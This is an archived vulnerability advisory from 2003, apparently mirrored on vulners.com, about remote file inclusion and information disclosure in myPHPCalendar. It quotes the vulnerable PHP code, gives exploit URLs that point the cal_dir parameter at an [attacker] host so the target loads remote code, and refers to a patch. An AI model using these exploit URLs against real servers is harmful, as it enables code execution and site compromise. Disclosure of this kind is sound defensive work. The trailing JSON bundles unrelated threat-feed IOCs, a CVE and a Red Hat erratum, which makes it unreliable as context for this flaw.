Search...

myPHPCalendar : Informations Disclosure, File Include

2003-10-14T00:00:00

ID SECURITYVULNS:DOC:5241
Type securityvulns
Reporter Securityvulns
Modified 2003-10-14T00:00:00

Description

Informations : °°°°°°°°°°°°° Language : PHP Version : 10192000 Build 1 Beta Website : http://myphpcalendar.sourceforge.net/ Problems : - Informations Disclosure - File Include

PHP Code/Location : °°°°°°°°°°°°°°°°°°°

admin.php, contacts.php, convert-date.php :

include ("globals.inc");

globals.inc :

include($cal_dir."vars.inc"); include($cal_dir."prefs.inc");

index.php :

include ($cal_dir."globals.inc"); [...] include($cal_dir."sql.inc");

setup.php :

$fp = fopen("setup.inc", "w+"); fputs($fp, "<?php\n"); fputs($fp, "\$url = \"".$URL."\";\n"); fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n"); fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n"); fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n"); fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n"); fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n"); fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n"); fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n"); fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n"); fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n"); fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n"); fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");

Exploits : °°°°°°°°

http://[target]/admin.php?cal_dir=http://[attacker]/ http://[target]/contacts.php?cal_dir=http://[attacker]/ http://[target]/convert-date.php?cal_dir=http://[attacker]/

will include the files :

http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

and http://[target]/index.php?cal_dir=http://[attacker]/ will include the files : http://[target]/globals.inc http://[target]/sql.inc

Patch : °°°°°°° A patch and more details can be found on http://www.phpsecure.info.

frog-m@n

Utilisez votre MSN Messenger via votre GSM ! http://www.fr.msn.be/gsm/servicesms/messengerparsms

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:5241", "bulletinFamily": "software", "title": "myPHPCalendar : Informations Disclosure, File Include", "description": "Informations :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\nLanguage : PHP\r\nVersion : 10192000 Build 1 Beta\r\nWebsite : http://myphpcalendar.sourceforge.net/\r\nProblems :\r\n- Informations Disclosure\r\n- File Include\r\n\r\n\r\nPHP Code/Location :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\n\r\nadmin.php, contacts.php, convert-date.php :\r\n\r\n------------------------\r\ninclude ("globals.inc");\r\n------------------------\r\n\r\nglobals.inc :\r\n\r\n------------------------------\r\ninclude($cal_dir."vars.inc");\r\ninclude($cal_dir."prefs.inc");\r\n------------------------------\r\n\r\n\r\nindex.php :\r\n\r\n----------------------------------------\r\ninclude ($cal_dir."globals.inc");\r\n[...]\r\ninclude($cal_dir."sql.inc");\r\n----------------------------------------\r\n\r\n\r\nsetup.php :\r\n\r\n----------------------------------------------------------------\r\n$fp = fopen("setup.inc", "w+");\r\nfputs($fp, "<?php\n");\r\nfputs($fp, "\$url = \"".$URL."\";\n");\r\nfputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");\r\nfputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");\r\nfputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");\r\nfputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");\r\nfputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");\r\nfputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");\r\nfputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");\r\nfputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");\r\nfputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");\r\nfputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");\r\nfputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");\r\n----------------------------------------------------------------\r\n\r\n\r\nExploits :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\n\r\nhttp://[target]/admin.php?cal_dir=http://[attacker]/\r\nhttp://[target]/contacts.php?cal_dir=http://[attacker]/\r\nhttp://[target]/convert-date.php?cal_dir=http://[attacker]/\r\n\r\nwill include the files :\r\n\r\nhttp://[attacker]/vars.inc and/or http://[attacker]/prefs.inc\r\n\r\nand http://[target]/index.php?cal_dir=http://[attacker]/ will include the \r\nfiles :\r\nhttp://[target]/globals.inc http://[target]/sql.inc\r\n\r\n\r\n\r\nPatch :\r\n\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\u00b0\r\nA patch and more details can be found on http://www.phpsecure.info.\r\n\r\n\r\n\r\n\r\nfrog-m@n\r\n\r\n_________________________________________________________________\r\nUtilisez votre MSN Messenger via votre GSM ! \r\nhttp://www.fr.msn.be/gsm/servicesms/messengerparsms\r\n", "published": "2003-10-14T00:00:00", "modified": "2003-10-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5241", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "edition": 1, "viewCount": 12, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-08-31T11:10:08", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2019-5241", "CVE-2020-5241", "CVE-2015-9286", "CVE-2008-7273", "CVE-2018-5241", "CVE-2008-7272"]}, {"type": "github", "idList": ["GHSA-3JQW-VV45-MJHH", "GHSA-49H4-G8P5-JGQ6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993367"]}, {"type": "mssecure", "idList": ["MSSECURE:31CD90CE39594318CC315D8AF7ED6A2C"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190109-01-PCMANAGER"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144891", "PACKETSTORM:149728"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140301", "OPENVAS:1361412562310891401"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1401.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1401-1:A41C0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:21BA30CBDC926C9B95A04B76A54421A4"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-5241"]}], "modified": "2018-08-31T11:10:08", "rev": 2}, "vulnersScore": 5.8}, "affectedSoftware": []}

{"rst": [{"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]32.158.236** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **37**.\n First seen: 2021-01-12T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 209: (First IP 71.32.128.0, Last IP 71.32.175.255).\nASN Name \"CENTURYLINKUSLEGACYQWEST\" and Organisation \"Qwest Communications Company LLC\".\nASN hosts 73950 domains.\nGEO IP information: City \"Culver\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-12T00:00:00", "id": "RST:E2D45D14-5241-3CAD-A985-984A6593A35D", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 71.32.158.236", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **73[.]136.17.3** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 7922: (First IP 73.127.0.0, Last IP 73.141.255.255).\nASN Name \"COMCAST7922\" and Organisation \"Comcast Cable Communications LLC\".\nASN hosts 160130 domains.\nGEO IP information: City \"League City\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:4E0499F9-5241-3041-93E7-5BA6A5A2DC2C", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 73.136.17.3", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **124[.]40.252.10** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **38**.\n First seen: 2021-01-13T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nASN 45305: (First IP 124.40.248.0, Last IP 124.40.255.255).\nASN Name \"LDPASID\" and Organisation \"Lintas Data Prima PT\".\nASN hosts 218 domains.\nGEO IP information: City \"Dibal\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-13T00:00:00", "id": "RST:AD487574-5241-329A-A534-4F114DEAC215", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 124.40.252.10", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pianoamulet[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:F4D990C8-5241-376D-86EA-5554A89D8E7F", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: pianoamulet.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **5241[.]it** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 185[.]53.177.52\nWhois:\n Created: 2013-01-03 04:39:07, \n Registrar: AMREG, \n Registrant: hidden.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:2A3A6EB7-CCB0-3C3C-BF13-6842C3D8C1B6", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: 5241.it", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **domaneora[.]firebaseapp.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 151[.]101.1.195,151.101.65.195\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:79BB9342-5241-3908-A698-97F61997D41D", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: domaneora.firebaseapp.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pillseore[.]ca** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **spam**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:1698DECE-5241-3896-9778-4F07489B557A", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: pillseore.ca", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-22T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **epk166[.]neoplus.adsl.tpnet.pl** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-22T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 83[.]20.52.166\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:058D4433-5241-3FF2-8784-34D43D22896D", "href": "", "published": "2021-01-23T00:00:00", "title": "RST Threat feed. IOC: epk166.neoplus.adsl.tpnet.pl", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-21T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **funzcity[.]tk** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-21T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 195[.]20.43.2\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:2DDBBB24-5241-3121-85CD-5659E8F3B602", "href": "", "published": "2021-01-22T00:00:00", "title": "RST Threat feed. IOC: funzcity.tk", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-20T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **dynamictoolbar[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-20T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 91[.]195.241.137,91.195.241.8,91.195.240.8\nWhois:\n Created: 2003-02-19 02:00:04, \n Registrar: DNC Holdings Inc, \n Registrant: unknown.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:C9410230-5241-32CD-A639-ABFE890CE9B0", "href": "", "published": "2021-01-21T00:00:00", "title": "RST Threat feed. IOC: dynamictoolbar.com", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2020-12-31T13:56:23", "description": "An unauthenticated remote attacker can send data to RsvcHost.exe listening on TCP port 5241 to add entries in the FactoryTalk Diagnostics event log. The attacker can specify long fields in the log entry, which can cause an unhandled exception in wcscpy_s() if a local user opens FactoryTalk Diagnostics Viewer (FTDiagViewer.exe) to view the log entry. Observed in FactoryTalk Diagnostics 6.11. All versions of FactoryTalk Diagnostics are affected.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-29T16:15:00", "title": "CVE-2020-5807", "type": "cve", "cwe": ["CWE-755"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5807"], "modified": "2020-12-30T18:44:00", "cpe": ["cpe:/a:rockwellautomation:factorytalk_diagnostics:6.11"], "id": "CVE-2020-5807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5807", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:rockwellautomation:factorytalk_diagnostics:6.11:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2020-12-17T09:30:27", "bulletinFamily": "unix", "cvelist": [], "description": "The fapolicyd software framework introduces a form of file access control based on a user-defined policy. The application file access control feature provides one of the most efficient ways to prevent running untrusted and possibly malicious applications on the system.\n\nBug Fix:\n\n* When an update replaces the binary of a running application, the kernel modifies the application binary path in memory by appending the \" (deleted)\" suffix. Previously, the fapolicyd file access policy daemon treated such applications as untrusted, and prevented them from opening and executing any other files. As a consequence, the system was sometimes unable to boot after applying updates.\n\nWith this update, fapolicyd ignores the suffix in the binary path so the binary can match the trust database. As a result, fapolicyd enforces the rules correctly and the update process can finish.\n\n(BZ#1906474)\n\nNote: The issue from BZ#1906474 was previously addressed in erratum RHBA-2020:5241 linked to from the References section. Due to the high impact of the issue that can cause systems to become unable to boot, we are releasing the same fix again in a security erratum to ensure proper visibility to users who only install security updates. This fix has not been changed in any way since the original bug fix erratum. This erratum does not provide any security fixes.\n\nFor more details about the issue, see the Knowledgebase article linked from the References section.", "modified": "2020-12-17T12:30:30", "published": "2020-12-17T12:20:15", "id": "RHSA-2020:5609", "href": "https://access.redhat.com/errata/RHSA-2020:5609", "type": "redhat", "title": "(RHSA-2020:5609) Important: fapolicyd bug fix update", "cvss": {"score": 0.0, "vector": "NONE"}}]}

myPHPCalendar : Informations Disclosure, File Include

Description

Informations : °°°°°°°°°°°°° Language : PHP Version : 10192000 Build 1 Beta Website : http://myphpcalendar.sourceforge.net/ Problems : - Informations Disclosure - File Include PHP Code/Location : °°°°°°°°°°°°°°°°°°° admin.php, contacts.php, convert-date.php :

include ("globals.inc");

Informations : °°°°°°°°°°°°° Language : PHP Version : 10192000 Build 1 Beta Website : http://myphpcalendar.sourceforge.net/ Problems : - Informations Disclosure - File Include

PHP Code/Location : °°°°°°°°°°°°°°°°°°°

admin.php, contacts.php, convert-date.php :